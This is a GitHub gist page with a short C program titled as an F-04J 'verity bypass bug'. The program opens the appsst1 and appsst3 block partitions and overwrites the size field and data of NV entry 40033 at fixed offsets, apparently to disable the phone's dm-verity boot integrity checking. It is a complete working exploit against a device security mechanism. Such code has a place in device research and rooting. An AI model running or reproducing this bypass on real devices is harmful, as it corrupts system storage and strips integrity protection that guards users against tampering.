Skip to content

Instantly share code, notes, and snippets.

@tewilove

tewilove/f-04j_verity_bypass.c

Last active March 6, 2024 11:39
Show Gist options
  • Save tewilove/756e5f975c635b72aa989725f524c889 to your computer and use it in GitHub Desktop.
Save tewilove/756e5f975c635b72aa989725f524c889 to your computer and use it in GitHub Desktop.
Download ZIP
F-04J verity bypass bug
Raw
f-04j_verity_bypass.c
#include <sys/types.h>
#include <fcntl.h>
#include <inttypes.h>
#include <unistd.h>
#include "f-04j.h"
#define OFFSET_ENTRY 0xA0
#define OFFSET_DATA 0x3620
struct nv_entry {
uint32_t id;
uint32_t flags;
uint32_t offset;
uint32_t size;
};
static int corrupt_nv_40033(const char *device)
{
int rc;
int fd;
uint64_t offset;
struct nv_entry e;
uint32_t d;
fd = open(device, O_RDWR);
if (fd < 0)
return -1;
offset = lseek(fd, OFFSET_ENTRY, SEEK_SET);
if (offset != OFFSET_ENTRY) {
close(fd);
return -1;
}
rc = read(fd, &e, sizeof(e));
if (rc != sizeof(e)) {
close(fd);
return -1;
}
if (e.id != 40033) {
close(fd);
return -1;
}
/* Make size mismatch! */
e.size = 3;
offset = lseek(fd, OFFSET_ENTRY, SEEK_SET);
if (offset != OFFSET_ENTRY) {
close(fd);
return -1;
}
rc = write(fd, &e, sizeof(e));
if (rc != sizeof(e)) {
close(fd);
return -1;
}
d = 0;
offset = lseek(fd, OFFSET_DATA, SEEK_SET);
if (offset != OFFSET_DATA) {
close(fd);
return -1;
}
rc = write(fd, &d, sizeof(d));
if (rc != sizeof(d)) {
close(fd);
return -1;
}
close(fd);
return 0;
}
int f04j_kill_verity(void)
{
int rc = 0;
rc |= corrupt_nv_40033("/dev/block/bootdevice/by-name/appsst1");
rc |= corrupt_nv_40033("/dev/block/bootdevice/by-name/appsst3");
return rc;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment